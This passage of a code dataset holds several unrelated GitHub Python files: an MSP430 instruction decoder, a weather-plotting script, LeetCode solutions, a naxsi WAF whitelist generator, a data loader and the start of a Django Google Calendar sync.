s.sid\n for key, value in replacements.items():\n sid_new = sid_new.replace(key, value)\n s.sid = sid_new\n s.hasOnlySubstanceUnits = False\n\npancreas_model = _m\n\n\ndef create_pancreas_model() -> FactoryResult:\n \"\"\"Creates minimal pancreas model\n\n :return: path to SBML file\n \"\"\"\n output_dir = Path(__file__).parent.parent.parent / \"models\" / f\"v{version}\"\n output_dir.mkdir(parents=True, exist_ok=True)\n\n results: FactoryResult = create_model(\n models=_m,\n output_dir=output_dir,\n annotations=None,\n create_report=True,\n )\n\n return results\n\n\nif __name__ == \"__main__\":\n results = create_pancreas_model()\n print(results.sbml_path)\n visualize_sbml(results.sbml_path)\n","repo_name":"matthiaskoenig/pancreas_minimal","sub_path":"panmin/model/pancreas_model.py","file_name":"pancreas_model.py","file_ext":"py","file_size_in_byte":9002,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"11087671987","text":"from scfmsp.controlflowanalysis.ExecutionPoint import ExecutionPoint\r\n\r\n\r\nclass AbstractInstruction:\r\n name = ''\r\n length = 2\r\n map1 = {}\r\n\r\n def __init__(self, function):\r\n self.file = ''\r\n self.program = function.program\r\n self.function = function\r\n\r\n self.address = 0\r\n self.length = 0\r\n self.clock = 0\r\n self.arguments = ()\r\n self.oplist = []\r\n \r\n self.register_mode = False\r\n self.indexed_mode = False\r\n self.indirect_mode = False\r\n self.immediate_mode = False\r\n self.dst_register_mode = False\r\n self.dst_indexed_mode = False\r\n\r\n self.immediate_dominator = None\r\n self.immediate_post_dominator = None\r\n self.predecessors = None\r\n\r\n self.__successors_checked_cache = None\r\n self.__execution_point = None\r\n\r\n def __unicode__(self):\r\n return '\"%s: %s %s\"' % (hex(self.address), self.name, self.arguments)\r\n\r\n\r\n def __repr__(self):\r\n return self.__unicode__()\r\n\r\n def parse(self, op_list):\r\n instr = ''\r\n self.oplist = op_list.split()\r\n temp = '{0:04b}'.format(int(self.oplist[0][0],16))\r\n temp1 = '{0:04b}'.format(int(self.oplist[0][3],16))\r\n temp2 = '{0:04b}'.format(int(self.oplist[0][2],16))\r\n # source addressing mode-----------------------------\r\n if (temp[2] == '0' and temp[3] == '0'):\r\n self.register_mode = True\r\n if (temp[2] == '0' and temp[3] == '1'):\r\n self.indexed_mode = True\r\n if (temp[2] == '1' and temp[3] == '0'):\r\n self.indirect_mode = True\r\n if(temp[2] == '1' and temp[3] == '1'):\r\n self.immediate_mode = True\r\n # destination addressing mode------------------\r\n if(temp[0] == '0'):\r\n 
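# NOTE (added, best-effort reading): this opcode bit selects register mode for the destination operand\r\n            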
self.dst_register_mode = True\r\n else:\r\n self.dst_indexed_mode = True\r\n\r\n # Instruction II (1 operand)-----------------------\r\n if (self.oplist[0][2] == '1'):\r\n arg1 = int(self.oplist[0][1],16)\r\n # Length of instructions and arguments ---------------\r\n if(self.register_mode):\r\n length = 1\r\n self.arguments = ('r'+str(arg1),)\r\n\r\n if(self.indirect_mode):\r\n length = 1\r\n self.arguments = ('r'+str(arg1),) \r\n\r\n if(self.indexed_mode):\r\n length = 2\r\n if(arg1 == 3):\r\n length = 1\r\n self.arguments = ('r'+str(arg1),) \r\n\r\n if(self.immediate_mode):\r\n if (self.oplist[0][1] == '0'):\r\n length = 2\r\n self.arguments = ('#'+self.oplist[0][6]+self.oplist[0][7]+self.oplist[0][4]+self.oplist[0][5],) \r\n else:\r\n length = 1\r\n self.arguments = ('r'+str(arg1),)\r\n # Instruction types II------------------------------------------\r\n if (temp1[2]=='0' and temp1[3]=='0' and temp[0]=='0'):\r\n if (temp[1] == '1'):\r\n instr = 'rrc.b'\r\n else:\r\n instr = 'rrc'\r\n if (temp1[2]=='0' and temp1[3]=='0' and temp[0]=='1'):\r\n instr = 'swpb'\r\n if (temp1[2]=='0' and temp1[3]=='1' and temp[0]=='0'):\r\n instr = 'rra'\r\n if (temp1[2]=='0' and temp1[3]=='1' and temp[0]=='1'):\r\n instr = 'sxt'\r\n if (temp1[2]=='1' and temp1[3]=='0' and temp[0]=='0'):\r\n instr = 'push'\r\n if (temp1[2]=='1' and temp1[3]=='0' and temp[0]=='1'):\r\n instr = 'call'\r\n if (temp1[2]=='1' and temp1[3]=='1' and temp[0]=='0'):\r\n instr = 'reti' \r\n\r\n\r\n # Instruction III-----------------------------------\r\n elif (self.oplist[0][2] == '2' or self.oplist[0][2] == '3'):\r\n # Length of instruction\r\n length = 1\r\n self.clock = 2\r\n # Instruction III\r\n if (temp2[3]=='0' and temp1[0]=='0' and temp1[1]=='0'):\r\n instr = 'jnz'\r\n if (temp2[3]=='0' and temp1[0]=='0' and temp1[1]=='1'):\r\n instr = 'jz'\r\n if (temp2[3]=='0' and temp1[0]=='1' and temp1[1]=='0'):\r\n instr = 'jnc'\r\n if (temp2[3]=='0' and temp1[0]=='1' and temp1[1]=='1'):\r\n instr = 'jc'\r\n if (temp2[3]=='1' and temp1[0]=='0' and temp1[1]=='0'):\r\n instr = 'jn'\r\n if (temp2[3]=='1' and temp1[0]=='0' and temp1[1]=='1'):\r\n instr = 'jge'\r\n if (temp2[3]=='1' and temp1[0]=='1' and temp1[1]=='0'):\r\n instr = 'jl'\r\n if (temp2[3]=='1' and temp1[0]=='1' and temp1[1]=='1'):\r\n instr = 'jmp'\r\n\r\n\r\n # Instruction I ------------------------------------\r\n else:\r\n arg1 = int(self.oplist[0][3],16)\r\n arg2 = int(self.oplist[0][1],16)\r\n # Length of instruction & arguments\r\n if(self.register_mode and self.dst_register_mode):\r\n length = 1\r\n self.clock = 1\r\n self.arguments = ('r'+str(arg1),'r'+str(arg2),)\r\n\r\n if(self.register_mode and self.dst_indexed_mode):\r\n length = 2\r\n self.clock = 4\r\n if(arg2 == 2):\r\n self.arguments = ('r'+str(arg1),'&'+self.oplist[0][6]+self.oplist[0][7]+self.oplist[0][4]+self.oplist[0][5],)\r\n else:\r\n self.arguments = ('r'+str(arg1),'r'+str(arg2),)\r\n\r\n if(self.indexed_mode and self.dst_register_mode):\r\n length = 2\r\n if (self.oplist[0][3] == '3'): # constant generator -------------\r\n length = 1\r\n self.clock = 1\r\n else:\r\n self.clock = 3\r\n if(arg1 == 2):\r\n self.arguments = ('&'+self.oplist[0][6]+self.oplist[0][7]+self.oplist[0][4]+self.oplist[0][5],'r'+str(arg2),)\r\n else:\r\n self.arguments = ('r'+str(arg1),'r'+str(arg2),) \r\n if(self.indexed_mode and self.dst_indexed_mode):\r\n length = 3\r\n self.clock = 6\r\n if (self.oplist[0][3] == '3'): # constant generator -------------\r\n length = 2\r\n self.clock = 4 \r\n if(arg1 == 2): \r\n self.arguments = 
('&'+self.oplist[0][6]+self.oplist[0][7]+self.oplist[0][4]+self.oplist[0][5],'&'+self.oplist[0][10]+self.oplist[0][11]+self.oplist[0][8]+self.oplist[0][9],)\r\n else:\r\n self.arguments = ('r'+str(arg1),'r'+str(arg2),)\r\n \r\n if(self.indirect_mode and self.dst_register_mode):\r\n length = 1\r\n if (self.oplist[0][3] == '2' or self.oplist[0][3] == '3'): # constant generator -------------\r\n self.clock = 1\r\n else:\r\n self.clock = 2\r\n self.arguments = ('r'+str(arg1),'r'+str(arg2),)\r\n\r\n if(self.indirect_mode and self.dst_indexed_mode):\r\n length = 2\r\n if (self.oplist[0][3] == '2' or self.oplist[0][3] == '3'): # constant generator -------------\r\n self.clock = 4\r\n else:\r\n self.clock = 5\r\n if(arg2 == 2):\r\n self.arguments = ('r'+str(arg1),'&'+self.oplist[0][6]+self.oplist[0][7]+self.oplist[0][4]+self.oplist[0][5],)\r\n else:\r\n self.arguments = ('r'+str(arg1),'r'+str(arg2),)\r\n\r\n if(self.immediate_mode and self.dst_register_mode):\r\n if (self.oplist[0][3] == '0'): #-----##------\r\n length = 2\r\n self.clock = 2\r\n self.arguments = ('#'+self.oplist[0][6]+self.oplist[0][7]+self.oplist[0][4]+self.oplist[0][5],'r'+str(arg2),)\r\n else:# indirect autoincrement -------------------\r\n length = 1\r\n if (self.oplist[0][3] == '2' or self.oplist[0][3] == '3'): # constant generator -------------\r\n self.clock = 1\r\n else:\r\n self.clock = 2\r\n self.arguments = ('r'+str(arg1),'r'+str(arg2),)\r\n\r\n if(self.immediate_mode and self.dst_indexed_mode):\r\n if (self.oplist[0][3] == '0'):#-----#------\r\n length = 3\r\n self.clock = 5\r\n self.arguments = ('#'+self.oplist[0][6]+self.oplist[0][7]+self.oplist[0][4]+self.oplist[0][5],'r'+str(arg2),)\r\n else:# indirect autoincrement -----------------------------\r\n length = 2\r\n if (self.oplist[0][3] == '2' or self.oplist[0][3] == '3'): # constant generator -------------\r\n self.clock = 4\r\n else:\r\n self.clock = 5\r\n self.arguments = ('r'+str(arg1),'r'+str(arg1),)\r\n\r\n # Instruction type I --------------------------------------------------------------------------------------------------------------------\r\n if (self.oplist[0][2] == '4'):\r\n if (temp[1] == '1'):\r\n instr = 'mov.b'\r\n else:\r\n instr = 'mov'\r\n if (self.oplist[0][2] == '5'):\r\n if (temp[1] == '1'):\r\n instr = 'add.b'\r\n else:\r\n instr = 'add'\r\n if (self.oplist[0][2] == '6'):\r\n if (temp[1] == '1'):\r\n instr = 'addc.b'\r\n else:\r\n instr = 'addc'\r\n if (self.oplist[0][2] == '7'):\r\n if (temp[1] == '1'):\r\n instr = 'subc.b'\r\n else:\r\n instr = 'subc'\r\n if (self.oplist[0][2] == '8'):\r\n if (temp[1] == '1'):\r\n instr = 'sub.b'\r\n else:\r\n instr = 'sub'\r\n if (self.oplist[0][2] == '9'):\r\n if (temp[1] == '1'):\r\n instr = 'cmp.b'\r\n else:\r\n instr = 'cmp' \r\n if (self.oplist[0][2] == 'a'):\r\n if (temp[1] == '1'):\r\n instr = 'dadd.b'\r\n else:\r\n instr = 'dadd'\r\n if (self.oplist[0][2] == 'b'):\r\n if (temp[1] == '1'):\r\n instr = 'bit.b'\r\n else:\r\n instr = 'bit'\r\n if (self.oplist[0][2] == 'c'):\r\n if (temp[1] == '1'):\r\n instr = 'bic.b'\r\n else:\r\n instr = 'bic'\r\n if (self.oplist[0][2] == 'd'):\r\n if (temp[1] == '1'):\r\n instr = 'bis.b'\r\n else:\r\n instr = 'bis'\r\n if (self.oplist[0][2] == 'e'):\r\n if (temp[1] == '1'):\r\n instr = 'xor.b'\r\n else:\r\n instr = 'xor'\r\n if (self.oplist[0][2] == 'f'):\r\n if (temp[1] == '1'):\r\n instr = 'and.b'\r\n else:\r\n instr = 'and'\r\n\r\n return instr, length, self.arguments, self.clock, self.register_mode, self.indexed_mode, self.immediate_mode, self.indirect_mode, 
self.dst_register_mode, self.dst_indexed_mode\r\n \r\n def get_info(self, length, address, arguments, clock, oplist, register, index, immediate, indirect, dst_register, dst_index, file):\r\n self.length = length\r\n self.address = address\r\n self.arguments = arguments\r\n self.clock = clock\r\n self.oplist = oplist\r\n self.register_mode = register\r\n self.indexed_mode = index\r\n self.immediate_mode = immediate\r\n self.indirect_mode = indirect\r\n self.dst_indexed_mode = dst_index\r\n self.dst_register_mode = dst_register\r\n self.file = file\r\n\r\n def get_execution_point(self):\r\n if self.__execution_point is None:\r\n self.__execution_point = ExecutionPoint(self.function.name, self.address, self.function.caller)\r\n return self.__execution_point\r\n\r\n def get_successors(self): \r\n return [self.get_execution_point().forward(self.length*2)]\r\n\r\n def get_successors_checked(self):\r\n if self.__successors_checked_cache is not None:\r\n return self.__successors_checked_cache\r\n successors = self.get_successors()\r\n ret = []\r\n for succ in successors:\r\n try:\r\n self.program.get_instruction_at_execution_point(succ)\r\n ret.append(succ)\r\n except:\r\n pass\r\n self.__successors_checked_cache = ret\r\n return ret\r\n\r\n def get_execution_time(self):\r\n pass\r\n\r\n def get_branching_time(self):\r\n return 2\r\n\r\n def get_region_then(self):\r\n return []\r\n\r\n def get_region_else(self):\r\n return []\r\n\r\n def _get_branchtime(self, region):\r\n ret = 0\r\n for ep in region:\r\n instr = self.program.get_instruction_at_execution_point(ep)\r\n ret += instr.get_execution_time()\r\n \r\n if not (ep == self.get_execution_point()):\r\n ret -= instr.get_branchtime_then() \r\n return ret\r\n\r\n def get_branchtime_then(self):\r\n return self._get_branchtime(self.get_region_then())\r\n\r\n def get_branchtime_else(self):\r\n return self._get_branchtime(self.get_region_else())\r\n\r\n def get_junction(self):\r\n return None\r\n\r\n def execute_judgment(self, ac):\r\n raise NotImplementedError('Instruction \"%s\" is lacking an execute_judgment implementation! At %s' %\r\n (self.name, self.get_execution_point()))\r\n\r\n","repo_name":"sepidehpouyan/SCF-MSP430","sub_path":"scfmsp/controlflowanalysis/AbstractInstruction.py","file_name":"AbstractInstruction.py","file_ext":"py","file_size_in_byte":14090,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"33598248431","text":"import csv\n\nopen_file = open(\"sitka_weather_07-2018_simple.csv\",\"r\")\n\ncsv_file = csv.reader(open_file, delimiter=\",\") # delimiter means the column separate by \",\"\n\nheader_row = next(csv_file ) # skip the first record on first row which is the header\n\n#The enumerate() function returns both the index of each item and the value of each \n#item as you loop through a list.\n# go to the first header line, the header row & tell the position of station/name/date... 
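etc. in the CSV header (NOTE, added: row[5], the TMAX column, holds the daily highs used below)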
\n# show the index value of each location in the header\n\nfor index, column_header in enumerate(header_row):\n    print(\"Index:\", index, \"Column Name:\", column_header)\n\nhighs = []\n\nfor row in csv_file:\n    highs.append(int(row[5]))\n\n# print(highs)\n\n# plot highs on a chart\n\nimport matplotlib.pyplot as plt\n\nplt.plot(highs, c = \"red\")\nplt.title(\"Daily high temperatures, July 2018\", fontsize = 16)\nplt.xlabel(\"\",fontsize = 16)\nplt.ylabel(\"Temperature(F)\", fontsize = 16)\nplt.tick_params(axis=\"both\", which=\"major\", labelsize = 16)\n\n\nplt.show()\n","repo_name":"Rurudo-9/CSV_Project","sub_path":"sitka_1.py","file_name":"sitka_1.py","file_ext":"py","file_size_in_byte":1001,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18202867242","text":"class Solution:\n    def simplifyPath(self, path: str) -> str:\n        stack = []\n\n        for part in path.split('/'):\n            if part in ('', '.'):\n                continue\n            if part == '..':\n                if stack:\n                    stack.pop()\n            else:\n                stack.append(part)\n\n        return '/' + '/'.join(stack)\n","repo_name":"walkccc/LeetCode","sub_path":"solutions/0071. Simplify Path/0071.py","file_name":"0071.py","file_ext":"py","file_size_in_byte":286,"program_lang":"python","lang":"en","doc_type":"code","stars":756,"dataset":"github-code","pt":"21"} +{"seq_id":"14011995192","text":"import pprint\nimport logging\n\nclass NxWhitelistExtractor:\n    def __init__(self, cursor, rules_file, pages_hit=10, rules_hit=20, exlog_max=5):\n        self.wrapper = cursor\n        self.rules_list = []\n        self.final_rules = []\n        self.base_rules = []\n        self.pages_hit = pages_hit\n        self.rules_hit = rules_hit\n        self.core_msg = {}\n        self.extract_core(rules_file)\n        self.exlog_max = exlog_max\n    \n    def extract_core(self, rules_file):\n        try:\n            fd = open(rules_file, 'r')\n            for i in fd:\n                if i.startswith('MainRule') or i.startswith('#@MainRule'):\n                    pos = i.find('id:')\n                    pos_msg = i.find('msg:')\n                    self.core_msg[i[pos + 3:i[pos + 3].find(';') - 1]] = i[pos_msg + 4:][:i[pos_msg + 4:].find('\"')]\n            fd.close()\n        except:\n            logging.warning(\"Unable to open rules file: \" + rules_file)\n            pass\n\n    def gen_basic_rules(self,url=None, srcip=None, dsthost=None,\n                        rule_id=None, exception_md5=None,\n                        exception_id=None):\n\n        tmp_rules = []\n        self.base_rules = self.rules_list[:]\n\n    def transform_to_dict(self, l):\n        d = {}\n        for i in l:\n            if i[0] not in d:\n                d[i[0]] = []\n            d[i[0]].append(i[1])\n        # eliminate duplicate ids in each value\n        for i in d:\n            d[i] = list(set(d[i]))\n        return d\n\n    def opti_rules_back(self):\n        \"\"\" Perform a series of predefined SELECTs to \n        find possible whitelist factorisations \"\"\"\n        # rules of requests extracting optimized whitelists, from \n        # more restrictive to less restrictive.\n        opti_select_DESC = [\n            (\"select count(*) as ct, e.rule_id, e.zone, e.var_name, u.url,\"\n            \"count(distinct c.peer_ip) as peer_count,\"\n            \"(select count(distinct peer_ip) from connections) as ptot,\"\n            \"(select count(*) from connections) as tot from exceptions as e \"\n            \"JOIN connections as c ON c.id_exception = e.exception_id \"\n            \"JOIN urls as u ON c.url_id = u.url_id \"\n            \"GROUP BY u.url, e.var_name,e.zone, e.rule_id \"\n            \"HAVING (ct) > ((select count(*) from connections)/1000);\"),\n            # select on var_name+zone+rule_id (unpredictable URL) \n            (\"select count(*) as ct, e.rule_id, e.zone, e.var_name, '' as url, count(distinct c.peer_ip) as peer_count, \"\n            \"(select count(distinct peer_ip) from connections) as ptot, \"\n            \"(select count(*) from connections) as tot \"\n            
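# NOTE (added): each SELECT tallies hits per candidate whitelist key (url, var_name, zone, rule_id) along with peer totals\n            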
\"from exceptions as e JOIN connections as c ON c.id_exception = e.exception_id \"\n \"JOIN urls as u ON c.url_id = u.url_id \"\n \"GROUP BY e.var_name,e.zone, e.rule_id HAVING (ct) > \"\n \"((select count(*) from connections)/1000)\"),\n # select on zone+url+rule_id (unpredictable arg_name) \n (\"select count(*) as ct, e.rule_id, e.zone, '' as var_name, u.url, count(distinct c.peer_ip) as peer_count, \"\n \"(select count(distinct peer_ip) from connections) as ptot, \"\n \"(select count(*) from connections) as tot \"\n \"from exceptions as e JOIN connections as c ON c.id_exception = e.exception_id \"\n \"JOIN urls as u ON c.url_id = u.url_id \"\n \"GROUP BY u.url, \"\n \"e.zone, e.rule_id HAVING (ct) > ((select count(*) from connections)/1000)\"),\n # select on zone+rule_id (mostly because of ARGS|NAME containing ie '[foo]')\n (\"select count(*) as ct, e.rule_id, e.zone, '' as var_name, '' as url, count(distinct c.peer_ip) as peer_count, \"\n \"(select count(distinct peer_ip) from connections) as ptot, \"\n \"(select count(*) from connections) as tot from exceptions as e, \"\n \"connections as c where c.id_exception = \"\n \"e.exception_id GROUP BY e.zone, e.rule_id HAVING (ct) > \"\n \"((select count(*) from connections)/1000);\"),\n # select on zone+url+var_name (unpredictable id)\n (\"select count(*) as ct, 0 as rule_id, e.zone, e.var_name, u.url, count(distinct c.peer_ip) as peer_count, \"\n \"(select count(distinct peer_ip) from connections) as ptot, \"\n \"(select count(*) from connections) as tot \"\n \"from exceptions as e JOIN connections as c ON c.id_exception = e.exception_id\"\n \" JOIN urls as u ON c.url_id = u.url_id\"\n \" GROUP BY u.url, \"\n \"e.zone, e.var_name HAVING (ct) > tot/1000\")\n ]\n for req in opti_select_DESC:\n res = self.wrapper.execute(req)\n# res = self.wrapper.getResults()\n for r in res:\n if len(r['var_name']) > 0:\n self.try_append({'url': r['url'], 'rule_id': r['rule_id'], 'zone': r['zone'], 'var_name': r['var_name'], \n 'hcount': r['ct'], 'htotal': r['tot'], 'pcount':r['peer_count'], 'ptotal':r['ptot'],\n 'pratio': round((r['peer_count'] / float(r['ptot'])) * 100,2),\n 'hratio': round((r['ct'] / float(r['tot'])) * 100,2)\n })\n else:\n self.try_append({'url': r['url'], 'rule_id': r['rule_id'], 'zone': r['zone'], 'var_name': '', \n 'hcount': r['ct'], 'htotal': r['tot'], 'ptotal':r['ptot'],\n 'pratio': round((r['peer_count'] / float(r['ptot'])) * 100,2),\n 'hratio': round((r['ct'] / float(r['tot'])) * 100,2),\n 'pcount':r['peer_count']})\n return self.base_rules, self.final_rules\n\n def try_append(self, target, delmatch=False):\n# print \"ruules\"+str(self.pages_hit)\n \"\"\"returns true if whitelist 'target' is already handled by final_rules\n does a dummy comparison and compares the counters\"\"\"\n count=0\n nb_rule=0\n uurl = set()\n \n for z in self.final_rules[:]:\n if len(target['url']) > 0 and len(z['url']) > 0 and target['url'] != z['url']:\n continue\n if target['rule_id'] != 0 and z['rule_id'] != 0 and target['rule_id'] != z['rule_id']:\n continue\n if len(target['zone']) > 0 and len(z['zone']) > 0 and target['zone'] != z['zone']:\n continue\n if len(target['var_name']) > 0 and len(z['var_name']) > 0 and target['var_name'] != z['var_name']:\n continue\n uurl.add(z['url'])\n if delmatch is True:\n self.final_rules.remove(z)\n else:\n nb_rule += 1\n count += int(z['hcount'])\n if delmatch is True:\n return\n # No rules are matching this one, append.\n if not count and not nb_rule:\n self.final_rules.append(target)\n # There is already existing 
rules that seem to cover this one.\n        # As rules are generated from stricter (url+zone+var_name+id) to lousier one (ie. id)\n        # Check if it's worth replacing those.\n        # Check the number of unique URLs covered by the rule\n        if target['hcount'] >= count and len(uurl) > self.pages_hit:\n            self.try_append(target, True)\n            self.final_rules.append(target)\n            return\n        # Check the number of unique IDs covered by the rule\n        #if (target['hcount'] > count+1) or (target['hcount'] >= count and nb_rule > self.rules_hit):\n        if (target['hcount'] >= count and nb_rule > self.rules_hit):\n            self.try_append(target, True)\n            self.final_rules.append(target)\n            return\n    \n    def lookup_exlog(self, rule):\n        \"\"\"Lookup into DB if we can find an exception \n        that fits the criteria, and has a content (from EXLOG)\"\"\"\n        first = True\n        args = []\n        append = \"\"\n        find_back = (\"select e.rule_id, e.zone, e.var_name, u.url, e.content \"\n                     \"from exceptions as e, urls as u, connections as c where \"\n                     \"c.url_id = u.url_id and c.id_exception = e.exception_id \"\n                     \" AND length(e.content) > 0 GROUP BY u.url, e.var_name, e.zone, e.rule_id\")\n        # If rule_id is present, match it.\n        if rule['rule_id'] != 0:\n            append += \"e.rule_id == ?\"\n            args.append(str(rule['rule_id']))\n            first = False\n        # same goes for zone\n        if len(rule['zone']) > 0:\n            if first is False:\n                append += \" AND \"\n            append += \"e.zone == ?\"\n            args.append(rule['zone'])\n            first = False\n        # and url\n        if len(rule['url']) > 0:\n            if first is False:\n                append += \" AND \"\n            append += \"u.url == ?\"\n            args.append(rule['url'])\n            first = False\n        # and finally, var_name\n        if len(rule['var_name']) > 0:\n            if first is False:\n                append += \" AND \"\n            append += \"e.var_name == ?\"\n            args.append(rule['var_name'])\n            first = False\n        \n        if first is False:\n            req = find_back+\" HAVING \"+append\n            res = self.wrapper.execute(req, tuple(args))\n#            res = self.wrapper.getResults()\n            return res\n    \n    def format_rules_output(self, opti_rules):\n        r = '########### Optimized Rules Suggestion ##################\\n'\n        if not len(opti_rules):\n            r += \"#No rules to be generated\\n\"\n            return r\n        opti_rules.sort(key=lambda k: (k['hratio'], k['pratio']))\n        _i = len(opti_rules)-1\n        while _i >= 0:\n            exlog_count = 0\n            i = opti_rules[_i]\n            _i = _i - 1\n            r += (\"# total_count:\"+str(i['hcount'])+\" (\"+str(i['hratio'])+\n                \"%), peer_count:\"+str(i['pcount'])+\" (\"+str(i['pratio'])+\"%)\")\n            r += \" | \"+self.core_msg.get(str(i['rule_id']), \"?\")+\"\\n\"\n            res = self.lookup_exlog(i)\n            for exlog in (res or []):\n                r += \"#example (from exlog) : '\"+str(exlog['content'])+\"'\\n\"\n                exlog_count += 1\n                if exlog_count > self.exlog_max:\n                    break\n            if (i['hratio'] < 5 and i['pratio'] < 5) or (i['pratio'] < 5):\n                r += '#'\n            r += 'BasicRule wl:' + str(i['rule_id']) + ' \"mz:'\n            if i['url'] is not None and len(i['url']) > 0:\n                r += '$URL:' + i['url']\n                if i['rule_id'] == 1 and i['zone'] == \"REQUEST\":\n                    r += '\";\\n'\n                    continue\n            if i['zone'] is not None and len(i['zone']) > 0:\n                if i['url']:\n                    r += '|'\n                if \"FILE_EXT\" in i['zone'] and i['var_name'] is not None and len(i['var_name']) > 0:\n                    i['zone'] = i['zone'].replace(\"FILE_EXT\", \"BODY\")\n                    if i['var_name'] is None:\n                        i['var_name'] = ''\n                    i['var_name'] = i['var_name']+\"|FILE_EXT\"\n                if \"|NAME\" in i['zone'] and i['var_name'] is not None and len(i['var_name']) > 0:\n                    i['zone'] = i['zone'].replace(\"|NAME\", \"\")\n                    if i['var_name'] is None:\n                        i['var_name'] = ''\n                    i['var_name'] = i['var_name']+\"|NAME\"\n                r += i['zone']\n                if i['var_name'] is not None and len(i['var_name']) > 
0:\n                r = r[:-len(i['zone'])]+\"$\"+r[-len(i['zone']):]\n                r += \"_VAR:\"+i['var_name']\n            r += '\";\\n' \n        return r\n","repo_name":"NeusoftSecurity/SEnginx","sub_path":"3rd-party/naxsi/nx_util/nx_lib/nx_whitelists.py","file_name":"nx_whitelists.py","file_ext":"py","file_size_in_byte":11745,"program_lang":"python","lang":"en","doc_type":"code","stars":182,"dataset":"github-code","pt":"21"} +{"seq_id":"13899001656","text":"import numpy as np\n\nfilename = '../observations/HX_pixelvalues.txt'\n\n\ndef load_obs_fromtxt(filename, gstar_jitter=0.5, region='',\n                     line_jitter=[0.1, 0.5, 0.5], line_mask=None):\n\n    cols = [('x', int), ('y', int), ('region', 'S50'),\n            ('line_intensity', float, 3), ('line_unc', float, 3),\n            ('line_mask', bool, 3),\n            ('FIR', float), ('FIR_unc', float),\n            ('Gstar', float), ('Gstar_unc', float)]\n\n    dat = np.loadtxt(filename, skiprows=2)\n    npix = dat.shape[0]\n    obs = np.zeros(npix, dtype=np.dtype(cols))\n\n    obs['x'] = dat[:, 0]\n    obs['y'] = dat[:, 1]\n    obs['region'] = region\n    lines = np.array([dat[:, 5], dat[:, 7], dat[:, 9]]).T # W/m^2/sr\n    obs['line_intensity'] = lines\n    obs['FIR'][:] = dat[:, 3] # W/m^2/sr\n    obs['FIR_unc'] = dat[:, 4]\n    obs['Gstar'] = dat[:, 2] # Habings\n    obs['Gstar_unc'] = obs['Gstar'] * gstar_jitter\n\n    obs['line_unc'] = np.array([dat[:, 6], dat[:, 8], dat[:, 10]]).T\n    extra_variance = (np.array(line_jitter) * obs['line_intensity'])**2\n    obs['line_unc'] = np.sqrt(obs['line_unc']**2 + extra_variance)\n\n    # Mask lines to ignore in the fits. 1 = fit, 0 = not fit.\n    # Order is CII, OI63, OI145\n    if line_mask is None:\n        obs['line_mask'] = (dat[:, -3:]) # LYNN\n    else:\n        obs['line_mask'][:] = line_mask\n\n    return obs\n\n\ndef load_observations_fromfits(files, fields):\n    # placeholder stub: FITS loading is not implemented yet\n    raise NotImplementedError\n\n\ndef write_dict(incat, outname='out.dat', csv=False, transpose=False):\n    \"\"\"Write a dictionary or Numpy structured array to an ascii file,\n    either space delimited or CSV.\n\n    :param incat:\n        The catalog to write out, either a dictionary or a numpy\n        structured array. If a dictionary, it is assumed that the\n        length of the value in each key:value pair is the same.\n\n    :param outname:\n        String giving the name of the file to which the output will be\n        written.\n\n    :param csv: If ``True`` the output file is CSV. 
If ``False`` the\n    output file is space delimited.\n    \"\"\"\n    try:\n        # input is a dictionary\n        colnames = list(incat.keys())\n    except AttributeError:\n        # input is a numpy structured array\n        colnames = incat.dtype.names\n\n    # Transpose arrays\n    if transpose:\n        for col in colnames:\n            incat[col] = list(np.array(incat[col]).T)\n\n    ncol = len(colnames)\n    nrow = len(incat[colnames[0]])\n    # Assert each column has the same number of rows and build the\n    # header\n    hdr = []\n    for c in colnames:\n        assert len(incat[c]) == nrow\n        hdr += np.size(incat[c][0]) * ['{}'.format(c)]\n\n    # Open file and write header\n    out = open(outname, 'w')\n    out.write('# ')\n    if csv:\n        out.write(','.join(hdr))\n        formatstring = (len(hdr)-1) * '{},' + '{}\\n'\n    else:\n        out.write(' '.join(hdr))\n        formatstring = len(hdr) * '{} ' + '\\n'\n    out.write('\\n')\n\n    for irow in range(nrow):\n        vals = []\n        for col in colnames:\n            # print(col, incat[col][irow])\n            vals += list(np.atleast_1d(incat[col][irow]))\n        out.write(formatstring.format(*vals))\n    out.close()\n","repo_name":"bd-j/pdrfit","sub_path":"pdrfit/io.py","file_name":"io.py","file_ext":"py","file_size_in_byte":3187,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18203238462","text":"class Solution:\n    def sortedListToBST(self, head: Optional[ListNode]) -> Optional[TreeNode]:\n        def helper(l: int, r: int) -> Optional[TreeNode]:\n            nonlocal head\n            if l > r:\n                return None\n\n            m = (l + r) // 2\n\n            # Simulate inorder traversal: recursively form the left half\n            left = helper(l, m - 1)\n\n            # Once left half is traversed, process the current node\n            root = TreeNode(head.val)\n            root.left = left\n\n            # Maintain the invariant\n            head = head.next\n\n            # Simulate inorder traversal: recursively form the right half\n            root.right = helper(m + 1, r)\n            return root\n\n        return helper(0, self._getLength(head) - 1)\n\n    def _getLength(self, head: Optional[ListNode]) -> int:\n        length = 0\n        curr = head\n        while curr:\n            length += 1\n            curr = curr.next\n        return length\n","repo_name":"walkccc/LeetCode","sub_path":"solutions/0109. 
Convert Sorted List to Binary Search Tree/0109-3.py","file_name":"0109-3.py","file_ext":"py","file_size_in_byte":835,"program_lang":"python","lang":"en","doc_type":"code","stars":756,"dataset":"github-code","pt":"21"} +{"seq_id":"14566361150","text":"import datetime\nimport json\nimport os\n\nfrom django.db.models.signals import post_delete, post_save\nfrom googleapiclient.discovery import build\nfrom googleapiclient.errors import HttpError\nfrom oauth2client.service_account import ServiceAccountCredentials\nfrom .models import Event\n\n# If modifying these scopes, delete the file token.json.\nSCOPES = [\"https://www.googleapis.com/auth/calendar\"]\n\n\ndef get_service(refresh=False):\n    credentials = ServiceAccountCredentials.from_json_keyfile_dict(\n        json.loads(os.environ.get(\"client_secret\")), scopes=SCOPES\n    )\n    # or if you have a file\n    # credentials = ServiceAccountCredentials.from_json_keyfile_name(\n    #     filename=\"file.json\", scopes=SCOPES\n    # )\n    service = build(\"calendar\", \"v3\", credentials=credentials)\n    return service\n\n\ndef handle_event(sender, created, instance, **kwargs):\n    \"\"\"Create the event in Google Calendar, or update it when it is changed on the website.\"\"\"\n    service = get_service()\n    event = instance\n    if not event.end_date:\n        event.end_date = event.start_date\n    if not event.end_time and event.start_time:\n        event.end_time = event.start_time\n    elif not 